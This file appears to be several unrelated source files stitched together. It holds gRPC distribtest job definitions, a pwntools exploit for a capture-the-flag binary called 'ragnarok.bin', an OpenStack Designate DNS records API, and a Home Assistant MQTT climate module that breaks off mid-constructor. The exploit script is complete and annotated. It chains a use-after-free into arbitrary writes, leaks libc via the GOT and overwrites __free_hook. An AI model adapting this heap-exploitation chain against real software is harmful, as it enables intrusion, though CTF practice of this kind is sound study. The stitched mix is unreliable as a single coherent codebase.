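#         'tools/dockerfile/distribtest/python_x64_buster',
#         'test/distrib/python/run_binary_distrib_test.sh',
#         copy_rel_path='test/distrib')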
def create_jobspec(name,
cmdline,
environ=None,
shell=False,
flake_retries=0,
timeout_retries=0,
use_workspace=False,
timeout_seconds=10 * 60):
"""Creates jobspec."""
    environ = (environ or {}).copy()  # tolerate the default of None
if use_workspace:
environ['WORKSPACE_NAME'] = 'workspace_%s' % name
cmdline = ['bash', 'tools/run_tests/artifacts/run_in_workspace.sh'
] + cmdline
jobspec = jobset.JobSpec(cmdline=cmdline,
environ=environ,
shortname='distribtest.%s' % (name),
timeout_seconds=timeout_seconds,
flake_retries=flake_retries,
timeout_retries=timeout_retries,
shell=shell)
return jobspec
class CSharpDistribTest(object):
"""Tests C# NuGet package"""
def __init__(self,
platform,
arch,
docker_suffix=None,
use_dotnet_cli=False,
presubmit=False):
self.name = 'csharp_%s_%s' % (platform, arch)
self.platform = platform
self.arch = arch
self.docker_suffix = docker_suffix
self.labels = ['distribtest', 'csharp', platform, arch]
if presubmit:
self.labels.append('presubmit')
self.script_suffix = ''
if docker_suffix:
self.name += '_%s' % docker_suffix
self.labels.append(docker_suffix)
if use_dotnet_cli:
self.name += '_dotnetcli'
self.script_suffix = '_dotnetcli'
self.labels.append('dotnetcli')
else:
self.labels.append('olddotnet')
def pre_build_jobspecs(self):
return []
def build_jobspec(self, inner_jobs=None):
        del inner_jobs  # arg unused as there is little opportunity for parallelizing what's inside the distribtests
if self.platform == 'linux':
return create_docker_jobspec(
self.name,
'tools/dockerfile/distribtest/csharp_%s_%s' %
(self.docker_suffix, self.arch),
'test/distrib/csharp/run_distrib_test%s.sh' %
self.script_suffix,
copy_rel_path='test/distrib')
elif self.platform == 'macos':
return create_jobspec(self.name, [
'test/distrib/csharp/run_distrib_test%s.sh' % self.script_suffix
],
environ={'EXTERNAL_GIT_ROOT': '../../../..'},
use_workspace=True)
elif self.platform == 'windows':
if self.arch == 'x64':
# Use double leading / as the first occurrence gets removed by msys bash
# when invoking the .bat file (side-effect of posix path conversion)
environ = {
'MSBUILD_EXTRA_ARGS': '//p:Platform=x64',
'DISTRIBTEST_OUTPATH': 'DistribTest\\bin\\x64\\Debug'
}
else:
environ = {'DISTRIBTEST_OUTPATH': 'DistribTest\\bin\\Debug'}
return create_jobspec(self.name, [
'test\\distrib\\csharp\\run_distrib_test%s.bat' %
self.script_suffix
],
environ=environ,
use_workspace=True)
else:
raise Exception("Not supported yet.")
def __str__(self):
return self.name
class PythonDistribTest(object):
"""Tests Python package"""
def __init__(self,
platform,
arch,
docker_suffix,
source=False,
presubmit=False):
self.source = source
if source:
self.name = 'python_dev_%s_%s_%s' % (platform, arch, docker_suffix)
else:
self.name = 'python_%s_%s_%s' % (platform, arch, docker_suffix)
self.platform = platform
self.arch = arch
self.docker_suffix = docker_suffix
self.labels = ['distribtest', 'python', platform, arch, docker_suffix]
if presubmit:
self.labels.append('presubmit')
def pre_build_jobspecs(self):
return []
def build_jobspec(self, inner_jobs=None):
# TODO(jtattermusch): honor inner_jobs arg for this task.
del inner_jobs
        if self.platform != 'linux':
raise Exception("Not supported yet.")
if self.source:
return create_docker_jobspec(
self.name,
'tools/dockerfile/distribtest/python_dev_%s_%s' %
(self.docker_suffix, self.arch),
'test/distrib/python/run_source_distrib_test.sh',
copy_rel_path='test/distrib')
else:
return create_docker_jobspec(
self.name,
'tools/dockerfile/distribtest/python_%s_%s' %
(self.docker_suffix, self.arch),
'test/distrib/python/run_binary_distrib_test.sh',
copy_rel_path='test/distrib')
def __str__(self):
return self.name
class RubyDistribTest(object):
"""Tests Ruby package"""
def __init__(self,
platform,
arch,
docker_suffix,
ruby_version=None,
source=False,
presubmit=False):
self.package_type = 'binary'
if source:
self.package_type = 'source'
self.name = 'ruby_%s_%s_%s_version_%s_package_type_%s' % (
platform, arch, docker_suffix, ruby_version or
'unspecified', self.package_type)
self.platform = platform
self.arch = arch
self.docker_suffix = docker_suffix
self.ruby_version = ruby_version
self.labels = ['distribtest', 'ruby', platform, arch, docker_suffix]
if presubmit:
self.labels.append('presubmit')
def pre_build_jobspecs(self):
return []
def build_jobspec(self, inner_jobs=None):
# TODO(jtattermusch): honor inner_jobs arg for this task.
del inner_jobs
arch_to_gem_arch = {
'x64': 'x86_64',
'x86': 'x86',
}
        if self.platform != 'linux':
raise Exception("Not supported yet.")
dockerfile_name = 'tools/dockerfile/distribtest/ruby_%s_%s' % (
self.docker_suffix, self.arch)
if self.ruby_version is not None:
dockerfile_name += '_%s' % self.ruby_version
return create_docker_jobspec(
self.name,
dockerfile_name,
'test/distrib/ruby/run_distrib_test.sh %s %s %s' %
(arch_to_gem_arch[self.arch], self.platform, self.package_type),
copy_rel_path='test/distrib')
def __str__(self):
return self.name
class PHP7DistribTest(object):
"""Tests PHP7 package"""
def __init__(self, platform, arch, docker_suffix=None, presubmit=False):
self.name = 'php7_%s_%s_%s' % (platform, arch, docker_suffix)
self.platform = platform
self.arch = arch
self.docker_suffix = docker_suffix
self.labels = ['distribtest', 'php', 'php7', platform, arch]
if presubmit:
self.labels.append('presubmit')
if docker_suffix:
self.labels.append(docker_suffix)
def pre_build_jobspecs(self):
return []
def build_jobspec(self, inner_jobs=None):
# TODO(jtattermusch): honor inner_jobs arg for this task.
del inner_jobs
if self.platform == 'linux':
return create_docker_jobspec(
self.name,
'tools/dockerfile/distribtest/php7_%s_%s' %
(self.docker_suffix, self.arch),
'test/distrib/php/run_distrib_test.sh',
copy_rel_path='test/distrib')
elif self.platform == 'macos':
return create_jobspec(
self.name, ['test/distrib/php/run_distrib_test_macos.sh'],
environ={'EXTERNAL_GIT_ROOT': '../../../..'},
timeout_seconds=15 * 60,
use_workspace=True)
else:
raise Exception("Not supported yet.")
def __str__(self):
return self.name
class CppDistribTest(object):
"""Tests Cpp make install by building examples."""
def __init__(self,
platform,
arch,
docker_suffix=None,
testcase=None,
presubmit=False):
if platform == 'linux':
self.name = 'cpp_%s_%s_%s_%s' % (platform, arch, docker_suffix,
testcase)
else:
self.name = 'cpp_%s_%s_%s' % (platform, arch, testcase)
self.platform = platform
self.arch = arch
self.docker_suffix = docker_suffix
self.testcase = testcase
self.labels = [
'distribtest',
'cpp',
platform,
arch,
testcase,
]
if presubmit:
self.labels.append('presubmit')
if docker_suffix:
self.labels.append(docker_suffix)
def pre_build_jobspecs(self):
return []
def build_jobspec(self, inner_jobs=None):
environ = {}
if inner_jobs is not None:
# set number of parallel jobs for the C++ build
environ['GRPC_CPP_DISTRIBTEST_BUILD_COMPILER_JOBS'] = str(
inner_jobs)
if self.platform == 'linux':
return create_docker_jobspec(
self.name,
'tools/dockerfile/distribtest/cpp_%s_%s' %
(self.docker_suffix, self.arch),
'test/distrib/cpp/run_distrib_test_%s.sh' % self.testcase,
timeout_seconds=45 * 60)
elif self.platform == 'windows':
return create_jobspec(
self.name,
['test\\distrib\\cpp\\run_distrib_test_%s.bat' % self.testcase],
environ={},
timeout_seconds=30 * 60,
use_workspace=True)
else:
raise Exception("Not supported yet.")
def __str__(self):
return self.name
def targets():
"""Gets list of supported targets"""
return [
# C++
CppDistribTest('linux',
'x64',
'jessie',
'cmake_as_submodule',
presubmit=True),
CppDistribTest('linux', 'x64', 'stretch', 'cmake', presubmit=True),
CppDistribTest('linux',
'x64',
'stretch',
'cmake_as_externalproject',
presubmit=True),
CppDistribTest('linux',
'x64',
'stretch',
'cmake_fetchcontent',
presubmit=True),
CppDistribTest('linux',
'x64',
'stretch',
'cmake_module_install',
presubmit=True),
CppDistribTest('linux',
'x64',
'stretch',
'cmake_module_install_pkgconfig',
presubmit=True),
CppDistribTest('linux',
'x64',
'stretch',
'cmake_pkgconfig',
presubmit=True),
CppDistribTest('linux',
'x64',
'stretch_aarch64_cross',
'cmake_aarch64_cross',
presubmit=True),
CppDistribTest('windows', 'x86', testcase='cmake', presubmit=True),
CppDistribTest('windows',
'x86',
testcase='cmake_as_externalproject',
presubmit=True),
# C#
CSharpDistribTest('linux', 'x64', 'jessie', presubmit=True),
CSharpDistribTest('linux', 'x64', 'stretch'),
CSharpDistribTest('linux',
'x64',
'stretch',
use_dotnet_cli=True,
presubmit=True),
CSharpDistribTest('linux', 'x64', 'centos7'),
CSharpDistribTest('linux', 'x64', 'ubuntu1604'),
CSharpDistribTest('linux', 'x64', 'ubuntu1604', use_dotnet_cli=True),
CSharpDistribTest('linux',
'x64',
'alpine',
use_dotnet_cli=True,
presubmit=True),
CSharpDistribTest('linux',
'x64',
'dotnet31',
use_dotnet_cli=True,
presubmit=True),
CSharpDistribTest('linux',
'x64',
'dotnet5',
use_dotnet_cli=True,
presubmit=True),
CSharpDistribTest('macos', 'x64', presubmit=True),
CSharpDistribTest('windows', 'x86', presubmit=True),
CSharpDistribTest('windows', 'x64', presubmit=True),
# Python
PythonDistribTest('linux', 'x64', 'buster', presubmit=True),
PythonDistribTest('linux', 'x86', 'buster', presubmit=True),
PythonDistribTest('linux', 'x64', 'centos7'),
PythonDistribTest('linux', 'x64', 'fedora34'),
PythonDistribTest('linux', 'x64', 'opensuse'),
PythonDistribTest('linux', 'x64', 'arch'),
PythonDistribTest('linux', 'x64', 'ubuntu1804'),
PythonDistribTest('linux', 'aarch64', 'python38_buster',
presubmit=True),
PythonDistribTest('linux',
'x64',
'alpine3.7',
source=True,
presubmit=True),
PythonDistribTest('linux', 'x64', 'buster', source=True,
presubmit=True),
PythonDistribTest('linux', 'x86', 'buster', source=True,
presubmit=True),
PythonDistribTest('linux', 'x64', 'centos7', source=True),
PythonDistribTest('linux', 'x64', 'fedora34', source=True),
PythonDistribTest('linux', 'x64', 'arch', source=True),
PythonDistribTest('linux', 'x64', 'ubuntu1804', source=True),
# Ruby
RubyDistribTest('linux', 'x64', 'stretch', ruby_version='ruby_2_5'),
RubyDistribTest('linux', 'x64', 'stretch', ruby_version='ruby_2_6'),
RubyDistribTest('linux',
'x64',
'stretch',
ruby_version='ruby_2_7',
presubmit=True),
# TODO(apolcyn): add a ruby 3.0 test once protobuf adds support
RubyDistribTest('linux',
'x64',
'stretch',
ruby_version='ruby_2_5',
source=True,
presubmit=True),
RubyDistribTest('linux', 'x64', 'centos7'),
RubyDistribTest('linux', 'x64', 'ubuntu1604'),
RubyDistribTest('linux', 'x64', 'ubuntu1804', presubmit=True),
# PHP7
PHP7DistribTest('linux', 'x64', 'stretch', presubmit=True),
PHP7DistribTest('macos', 'x64', presubmit=True),
]
|
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *
context(arch='amd64', os='linux', aslr=True, terminal=['tmux', 'neww'])
env = {'LD_PRELOAD': './libvtv.so.0'}
if args['GDB']:
io = gdb.debug('./ragnarok.bin', env=env, gdbscript='''\
set follow-fork-mode parent
c
''')
elf, libc = io.elf, ELF('libs/amd64/2.26/0ubuntu2/libc-2.26.so')
else:
io = process('./ragnarok.bin-amd64-2.26-0ubuntu2', env=env)
elf, libc = io.elf, ELF('libs/amd64/2.26/0ubuntu2/libc-2.26.so')
# thanks to https://gist.github.com/saelo/0c77ce6c2b84af70644d81802892c289
# tl;dr:
# we obtain arbitrary writes thanks to a use-after-free vulnerability, and use them
# to overwrite __free_hook with puts() to execute the code at line 715 of ragnarok.cc
def earn_money(n):
char_matchers = {
'h': re.compile(r'^ \S \S '),
'i': re.compile(r'^ \S\S\S '),
't': re.compile(r'^ \S\S\S\S\S\S\S '),
'c': re.compile(r'^ \S\S\S\S \n \S '),
'o': re.compile(r'^ \S\S\S\S \n \S \S '),
'n': re.compile(r'^ \S \S ')
}
for _ in range(n):
io.recvuntil('***************************\n')
output = io.recvuntil('\n***************************\n', drop=True)
io.recvuntil('Magic : ')
for c, p in char_matchers.items():
if p.match(output):
io.sendline(c)
break
else:
raise AssertionError
io.sendline('q')
def fight():
while True:
# always attack
io.recvuntil('Your choice :')
io.sendline('1')
while True:
output = io.recvline()
if 'You died' in output:
return False
elif 'You win' in output:
io.recvuntil('Name :')
io.sendline('integeruser')
return True
elif '=============' in output:
break
# to trigger the vulnerability (explained later) and exploit the binary,
# we need to equip Odin with a weapon named "Gungnir"
# to make and equip any weapon we need lots of money, but enough of it can be earned
# by choosing Thor and winning a fight
while True:
# earn some money to be able to continue if defeated in fight
io.recvuntil('Your choice :')
io.sendline('3')
earn_money(3)
# choose Thor
io.recvuntil('Your choice :')
io.sendline('1')
io.recvuntil('Choose your figure :')
io.sendline('2')
# fight
io.recvuntil('Your choice :')
io.sendline('5')
won = fight()
if won: break
# defeated, continue?
io.sendline('1')
success('Fight won')
# now we have enough money to make and equip a weapon, but we need to switch
# character from Thor to Odin
# to do so, fight again until defeated
while True:
# fight
io.recvuntil('Your choice :')
io.sendline('5')
won = fight()
if not won:
# defeated, continue?
io.sendline('1')
break
success('Fight lost')
# now we can choose a new character
# choose Odin
io.recvuntil('Your choice :')
io.sendline('1')
io.recvuntil('Choose your figure :')
io.sendline('1')
# equipping a weapon named "Gungnir" to Odin triggers the execution of
# `cast_spell(shared_ptr<Figure>(this))` at line 173, resulting in two different shared pointers
# for the same object (the other pointer is the global `shared_ptr<Figure> character`
# at line 122)
# when `cast_spell()` terminates, the chunk pointed by the local shared pointer will be freed,
# resulting in a use-after-free for the global pointer
io.recvuntil('Your choice :')
io.sendline('4')
io.recvuntil('Name of your weapon :')
io.sendline('Gungnir')
# `std::string`s are represented in memory as:
# {
# pointer to data buffer,
# current size,
# maximum size (capacity)
# }
# in string assignments, if the capacity of the destination string is greater
# than or equal to the size of the source string, then the content of the source
# data buffer is simply memcpy'ed into the destination data buffer
# if we change description (see `change_descript()` at line 545) with a string big enough,
# then the `std::string desc` allocated at line 549 will overlap the chunk containing
# the data for the chosen character
# in this way, in the string assignment `desc = str` at line 69, we control both
# the full structure of `desc` (destination) and the content of `str` (source),
# and by manipulating the structure of `desc` we obtain an arbitrary memcpy
io.recvuntil('Your choice :')
io.sendline('6')
io.recvuntil('Description : ')
# we use this arbitrary write to construct a fake Odin figure in BSS and change
# the global `character` pointer to point to it
vtable_odin_address = 0x40c700
where = 0x613648
fake_odin_address = 0x613648 + 0x8 * 12
what = ''.join(
p64(data)
for data in [
0x0,
fake_odin_address, # `character` (line 122)
0x0,
0x0,
0x0,
where, # pointer to data buffer
0xffffffffffffffff, # size
0xffffffffffffffff, # capacity (also overlaps with `money` and `highest` (lines 124-125))
0x0,
0x0,
0x0,
0x0,
# fake Odin figure
vtable_odin_address,
0x0, # `name`
0x0,
0x0,
0x0,
fake_odin_address, # `desc` (**)
0x100,
0x100,
0x0,
elf.symbols['got.free'], # `weapon` (*)
0x8,
0x8,
0x0,
0x41414141, # `atk`
0x41414141, # `hp`
])
io.sendline(what)
# now, this fake figure was constructed in such a way that the `std::string` structure
# for `weapon` (see (*)) points to the GOT address of free()
# in this way, we can simply call `show_figure()` at line 530 to leak the address of free()
io.recvuntil('Your choice :')
io.sendline('2')
io.recvuntil('Weapon : ')
free_address = u64(io.recvn(8))
if free_address != libc.symbols['free']:
libc.address = free_address - libc.symbols['free']
success('libc.address: %s' % hex(libc.address))
__free_hook_address = libc.symbols['__free_hook']
success('__free_hook_address: %s' % hex(__free_hook_address))
# in the same way, the `std::string` structure for `desc` (see (**)) was crafted
# in such a way that when `change_descript()` is called and `change_desc()` invoked
# we obtain an arbitrary write at the address of its data buffer
io.recvuntil('Your choice :')
io.sendline('6')
io.recvuntil('Description : ')
# we use this arbitrary write to change the `weapon` of our fake Odin figure to
# point to the address of __free_hook
where = fake_odin_address
what = b''.join(
p64(data)
for data in [
vtable_odin_address,
0x0, # `name`
0x0,
0x0,
0x0,
where, # `desc`
0x0,
0x0,
0x0,
__free_hook_address, # `weapon`
0x0, # the string must be empty to pass the check at line 166
0x8
])
io.sendline(what)
# now, we trigger the arbitrary write `weapon = str` at line 167 and set __free_hook to puts()
io.recvuntil('Your choice :')
io.sendline('4')
io.recvuntil('Name of your weapon :')
io.sendline(p64(libc.symbols['puts']))
# win any fight to print the flag on screen
io.recvuntil('Your choice :')
io.sendline('5')
io.sendline('1')
io.recvuntil('Something for you :)')
io.interactive()
|
|
# Copyright 2012 Managed I.T.
#
# Author: Kiall Mac Innes <kiall@managedit.ie>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import flask
from oslo_log import log as logging
from designate.central import rpcapi as central_rpcapi
from designate import exceptions
from designate import objects
from designate import schema
from designate import utils
LOG = logging.getLogger(__name__)
blueprint = flask.Blueprint('records', __name__)
record_schema = schema.Schema('v1', 'record')
records_schema = schema.Schema('v1', 'records')
def _find_recordset(context, domain_id, name, type):
central_api = central_rpcapi.CentralAPI.get_instance()
return central_api.find_recordset(context, {
'zone_id': domain_id,
'name': name,
'type': type,
})
def _find_or_create_recordset(context, domain_id, name, type, ttl):
central_api = central_rpcapi.CentralAPI.get_instance()
criterion = {"id": domain_id, "type": "PRIMARY", "action": "!DELETE"}
central_api.find_zone(context, criterion=criterion)
try:
# Attempt to create an empty recordset
values = {
'name': name,
'type': type,
'ttl': ttl,
}
recordset = central_api.create_recordset(
context, domain_id, objects.RecordSet(**values))
except exceptions.DuplicateRecordSet:
# Fetch the existing recordset
recordset = _find_recordset(context, domain_id, name, type)
return recordset
def _extract_record_values(values):
record_values = dict((k, values[k]) for k in ('data', 'description',)
if k in values)
if values.get('priority', None) is not None:
record_values['data'] = '%d %s' % (
values['priority'], record_values['data'])
return record_values
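# illustrative effect of the priority folding above: an MX record posted as
#   {'data': 'mail.example.org.', 'priority': 10}
# is stored with 'data' == '10 mail.example.org.'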
def _extract_recordset_values(values):
recordset_values = ('name', 'type', 'ttl',)
return dict((k, values[k]) for k in recordset_values if k in values)
def _format_record_v1(record, recordset):
record = dict(record)
record['priority'], record['data'] = utils.extract_priority_from_data(
recordset.type, record)
record['domain_id'] = record['zone_id']
del record['zone_id']
record.update({
'name': recordset['name'],
'type': recordset['type'],
'ttl': recordset['ttl'],
})
return record
@blueprint.route('/schemas/record', methods=['GET'])
def get_record_schema():
return flask.jsonify(record_schema.raw)
@blueprint.route('/schemas/records', methods=['GET'])
def get_records_schema():
return flask.jsonify(records_schema.raw)
@blueprint.route('/domains/<uuid:domain_id>/records', methods=['POST'])
def create_record(domain_id):
context = flask.request.environ.get('context')
values = flask.request.json
record_schema.validate(values)
if values['type'] == 'SOA':
raise exceptions.BadRequest('SOA records cannot be manually created.')
recordset = _find_or_create_recordset(context,
domain_id,
values['name'],
values['type'],
values.get('ttl', None))
record = objects.Record(**_extract_record_values(values))
central_api = central_rpcapi.CentralAPI.get_instance()
record = central_api.create_record(context, domain_id,
recordset['id'],
record)
record = _format_record_v1(record, recordset)
response = flask.jsonify(record_schema.filter(record))
response.status_code = 201
response.location = flask.url_for('.get_record', domain_id=domain_id,
record_id=record['id'])
return response
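# illustrative request for the endpoint above (values are hypothetical):
#   POST /domains/<domain_id>/records
#   {"name": "www.example.org.", "type": "A", "data": "192.0.2.1"}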
@blueprint.route('/domains/<uuid:domain_id>/records', methods=['GET'])
def get_records(domain_id):
context = flask.request.environ.get('context')
central_api = central_rpcapi.CentralAPI.get_instance()
# NOTE: We need to ensure the domain actually exists, otherwise we may
# return an empty records array instead of a domain not found
central_api.get_zone(context, domain_id)
recordsets = central_api.find_recordsets(context, {'zone_id': domain_id})
records = []
for rrset in recordsets:
records.extend([_format_record_v1(r, rrset) for r in rrset.records])
return flask.jsonify(records_schema.filter({'records': records}))
@blueprint.route('/domains/<uuid:domain_id>/records/<uuid:record_id>',
methods=['GET'])
def get_record(domain_id, record_id):
context = flask.request.environ.get('context')
central_api = central_rpcapi.CentralAPI.get_instance()
# NOTE: We need to ensure the domain actually exists, otherwise we may
# return a record not found instead of a domain not found
central_api.get_zone(context, domain_id)
criterion = {'zone_id': domain_id, 'id': record_id}
record = central_api.find_record(context, criterion)
recordset = central_api.get_recordset(
context, domain_id, record['recordset_id'])
record = _format_record_v1(record, recordset)
return flask.jsonify(record_schema.filter(record))
@blueprint.route('/domains/<uuid:domain_id>/records/<uuid:record_id>',
methods=['PUT'])
def update_record(domain_id, record_id):
context = flask.request.environ.get('context')
values = flask.request.json
central_api = central_rpcapi.CentralAPI.get_instance()
# NOTE: We need to ensure the domain actually exists, otherwise we may
# return a record not found instead of a domain not found
criterion = {"id": domain_id, "type": "PRIMARY", "action": "!DELETE"}
central_api.find_zone(context, criterion)
# Fetch the existing resource
# NOTE(kiall): We use "find_record" rather than "get_record" as we do not
# have the recordset_id.
criterion = {'zone_id': domain_id, 'id': record_id}
record = central_api.find_record(context, criterion)
# TODO(graham): Move this further down the stack
if record.managed and not context.edit_managed_records:
raise exceptions.BadRequest('Managed records may not be updated')
# Find the associated recordset
recordset = central_api.get_recordset(
context, domain_id, record.recordset_id)
# Prepare a dict of fields for validation
record_data = record_schema.filter(_format_record_v1(record, recordset))
record_data.update(values)
# Validate the new set of data
record_schema.validate(record_data)
# Update and persist the resource
record.update(_extract_record_values(values))
record = central_api.update_record(context, record)
# Update the recordset resource (if necessary)
recordset.update(_extract_recordset_values(values))
if len(recordset.obj_what_changed()) > 0:
recordset = central_api.update_recordset(context, recordset)
# Format and return the response
record = _format_record_v1(record, recordset)
return flask.jsonify(record_schema.filter(record))
def _delete_recordset_if_empty(context, domain_id, recordset_id):
central_api = central_rpcapi.CentralAPI.get_instance()
recordset = central_api.find_recordset(context, {
'id': recordset_id
})
# Delete the recordset only if it no longer contains any records
if len(recordset.records) == 0:
central_api.delete_recordset(context, domain_id, recordset_id)
@blueprint.route('/domains/<uuid:domain_id>/records/<uuid:record_id>',
methods=['DELETE'])
def delete_record(domain_id, record_id):
context = flask.request.environ.get('context')
central_api = central_rpcapi.CentralAPI.get_instance()
# NOTE: We need to ensure the domain actually exists, otherwise we may
# return a record not found instead of a domain not found
criterion = {"id": domain_id, "type": "PRIMARY", "action": "!DELETE"}
central_api.find_zone(context, criterion=criterion)
# Find the record
criterion = {'zone_id': domain_id, 'id': record_id}
record = central_api.find_record(context, criterion)
central_api.delete_record(
context, domain_id, record['recordset_id'], record_id)
_delete_recordset_if_empty(context, domain_id, record['recordset_id'])
return flask.Response(status=200)
|
|
"""
Support for MQTT climate devices.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/climate.mqtt/
"""
import asyncio
import logging
import voluptuous as vol
from homeassistant.core import callback
import homeassistant.components.mqtt as mqtt
from homeassistant.components.climate import (
STATE_HEAT, STATE_COOL, STATE_DRY, STATE_FAN_ONLY, ClimateDevice,
PLATFORM_SCHEMA as CLIMATE_PLATFORM_SCHEMA, STATE_AUTO,
ATTR_OPERATION_MODE, SUPPORT_TARGET_TEMPERATURE, SUPPORT_OPERATION_MODE,
SUPPORT_SWING_MODE, SUPPORT_FAN_MODE, SUPPORT_AWAY_MODE, SUPPORT_HOLD_MODE,
SUPPORT_AUX_HEAT)
from homeassistant.const import (
STATE_ON, STATE_OFF, ATTR_TEMPERATURE, CONF_NAME)
from homeassistant.components.mqtt import (CONF_QOS, CONF_RETAIN,
MQTT_BASE_PLATFORM_SCHEMA)
import homeassistant.helpers.config_validation as cv
from homeassistant.components.fan import (SPEED_LOW, SPEED_MEDIUM,
SPEED_HIGH)
_LOGGER = logging.getLogger(__name__)
DEPENDENCIES = ['mqtt']
DEFAULT_NAME = 'MQTT HVAC'
CONF_POWER_COMMAND_TOPIC = 'power_command_topic'
CONF_POWER_STATE_TOPIC = 'power_state_topic'
CONF_MODE_COMMAND_TOPIC = 'mode_command_topic'
CONF_MODE_STATE_TOPIC = 'mode_state_topic'
CONF_TEMPERATURE_COMMAND_TOPIC = 'temperature_command_topic'
CONF_TEMPERATURE_STATE_TOPIC = 'temperature_state_topic'
CONF_FAN_MODE_COMMAND_TOPIC = 'fan_mode_command_topic'
CONF_FAN_MODE_STATE_TOPIC = 'fan_mode_state_topic'
CONF_SWING_MODE_COMMAND_TOPIC = 'swing_mode_command_topic'
CONF_SWING_MODE_STATE_TOPIC = 'swing_mode_state_topic'
CONF_AWAY_MODE_COMMAND_TOPIC = 'away_mode_command_topic'
CONF_AWAY_MODE_STATE_TOPIC = 'away_mode_state_topic'
CONF_HOLD_COMMAND_TOPIC = 'hold_command_topic'
CONF_HOLD_STATE_TOPIC = 'hold_state_topic'
CONF_AUX_COMMAND_TOPIC = 'aux_command_topic'
CONF_AUX_STATE_TOPIC = 'aux_state_topic'
CONF_CURRENT_TEMPERATURE_TOPIC = 'current_temperature_topic'
CONF_PAYLOAD_ON = 'payload_on'
CONF_PAYLOAD_OFF = 'payload_off'
CONF_FAN_MODE_LIST = 'fan_modes'
CONF_MODE_LIST = 'modes'
CONF_SWING_MODE_LIST = 'swing_modes'
CONF_INITIAL = 'initial'
CONF_SEND_IF_OFF = 'send_if_off'
SCHEMA_BASE = CLIMATE_PLATFORM_SCHEMA.extend(MQTT_BASE_PLATFORM_SCHEMA.schema)
PLATFORM_SCHEMA = SCHEMA_BASE.extend({
vol.Optional(CONF_POWER_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_MODE_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_TEMPERATURE_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_FAN_MODE_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_SWING_MODE_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_AWAY_MODE_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_HOLD_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_AUX_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_POWER_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_MODE_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_TEMPERATURE_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_FAN_MODE_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_SWING_MODE_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_AWAY_MODE_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_HOLD_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_AUX_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_CURRENT_TEMPERATURE_TOPIC):
mqtt.valid_subscribe_topic,
vol.Optional(CONF_FAN_MODE_LIST,
default=[STATE_AUTO, SPEED_LOW,
SPEED_MEDIUM, SPEED_HIGH]): cv.ensure_list,
vol.Optional(CONF_SWING_MODE_LIST,
default=[STATE_ON, STATE_OFF]): cv.ensure_list,
vol.Optional(CONF_MODE_LIST,
default=[STATE_AUTO, STATE_OFF, STATE_COOL, STATE_HEAT,
STATE_DRY, STATE_FAN_ONLY]): cv.ensure_list,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_INITIAL, default=21): cv.positive_int,
vol.Optional(CONF_SEND_IF_OFF, default=True): cv.boolean,
vol.Optional(CONF_PAYLOAD_ON, default="ON"): cv.string,
vol.Optional(CONF_PAYLOAD_OFF, default="OFF"): cv.string,
})
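# illustrative configuration.yaml entry for the schema above (topic names
# are hypothetical; any of the other optional topics can be added the same
# way):
#
# climate:
#   - platform: mqtt
#     name: Study
#     mode_command_topic: "study/ac/mode/set"
#     temperature_command_topic: "study/ac/temperature/set"
#     fan_mode_command_topic: "study/ac/fan/set"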
@asyncio.coroutine
def async_setup_platform(hass, config, async_add_devices, discovery_info=None):
"""Set up the MQTT climate devices."""
async_add_devices([
MqttClimate(
hass,
config.get(CONF_NAME),
{
key: config.get(key) for key in (
CONF_POWER_COMMAND_TOPIC,
CONF_MODE_COMMAND_TOPIC,
CONF_TEMPERATURE_COMMAND_TOPIC,
CONF_FAN_MODE_COMMAND_TOPIC,
CONF_SWING_MODE_COMMAND_TOPIC,
CONF_AWAY_MODE_COMMAND_TOPIC,
CONF_HOLD_COMMAND_TOPIC,
CONF_AUX_COMMAND_TOPIC,
CONF_POWER_STATE_TOPIC,
CONF_MODE_STATE_TOPIC,
CONF_TEMPERATURE_STATE_TOPIC,
CONF_FAN_MODE_STATE_TOPIC,
CONF_SWING_MODE_STATE_TOPIC,
CONF_AWAY_MODE_STATE_TOPIC,
CONF_HOLD_STATE_TOPIC,
CONF_AUX_STATE_TOPIC,
CONF_CURRENT_TEMPERATURE_TOPIC
)
},
config.get(CONF_QOS),
config.get(CONF_RETAIN),
config.get(CONF_MODE_LIST),
config.get(CONF_FAN_MODE_LIST),
config.get(CONF_SWING_MODE_LIST),
config.get(CONF_INITIAL),
False, None, SPEED_LOW,
STATE_OFF, STATE_OFF, False,
config.get(CONF_SEND_IF_OFF),
config.get(CONF_PAYLOAD_ON),
config.get(CONF_PAYLOAD_OFF))
])
class MqttClimate(ClimateDevice):
"""Representation of a demo climate device."""
def __init__(self, hass, name, topic, qos, retain, mode_list,
fan_mode_list, swing_mode_list, target_temperature, away,
hold, current_fan_mode, current_swing_mode,
current_operation, aux, send_if_off, payload_on,
payload_off):
"""Initialize the climate device."""
self.hass = hass
self._name = name
self._topic = topic
self._qos = qos
self._retain = retain
self._target_temperature = target_temperature
self._unit_of_measurement = hass.config.units.temperature_unit
self._away = away
self._hold = hold
self._current_temperature = None
self._current_fan_mode = current_fan_mode
self._current_operation = current_operation
self._aux = aux
